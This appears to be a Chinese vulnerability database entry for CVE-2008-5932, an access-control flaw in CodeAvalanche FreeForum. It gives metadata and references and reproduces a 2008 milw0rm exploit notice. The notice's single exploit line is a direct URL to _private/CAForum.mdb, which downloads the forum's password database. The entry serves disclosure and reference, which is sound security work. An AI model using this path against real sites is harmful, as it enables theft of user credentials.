CodeAvalanche FreeForum 权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117035 漏洞类型 权限许可和访问控制
发布时间 2008-12-14 更新时间 2009-01-21
CVE编号 CVE-2008-5932 CNNVD-ID CNNVD-200901-254
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7450
https://www.securityfocus.com/bid/84602
https://cxsecurity.com/issue/WLB-2009010182
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-254
|漏洞详情
CodeAvalancheFreeForum在web根下储存敏感信息而未赋予足够的访问控制,这使得远程攻击者可以借助一个对_private/CAForum.mdb的直接请求,下载包含密码的数据库文件。
|漏洞EXP
####################################################################################################
# FreeForum Database Disclosure Vulnerability                                                      #
# © Ghost Hacker - REAL-H.COM                                                                      #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Homepage : http://Real-h.com                                                                  #
#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
#[~] Name Script : FreeForum                                                                       #
#[~] Download : http://www.truecontent.info/codeavalanche/asp-forum-script.php                     #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/CAForum/_private/CAForum.mdb                                              #
####################################################################################################
#[~]Greets :           &nbs p;                                                                     #
# Mr.SaFa7 [v4-team.com] , AlpHaNiX , Qabandi                                                      #
# All Members Real-h.com and v4-team.net , All My Friends                                          #
####################################################################################################

# milw0rm.com [2008-12-14]
|受影响的产品
CodeAvalanche Freeforum Nil
|参考资料

来源:MILW0RM
名称:7450
链接:http://www.milw0rm.com/exploits/7450
来源:SREASON
名称:4932
链接:http://securityreason.com/securityalert/4932
来源:SECUNIA
名称:33100
链接:http://secunia.com/advisories/33100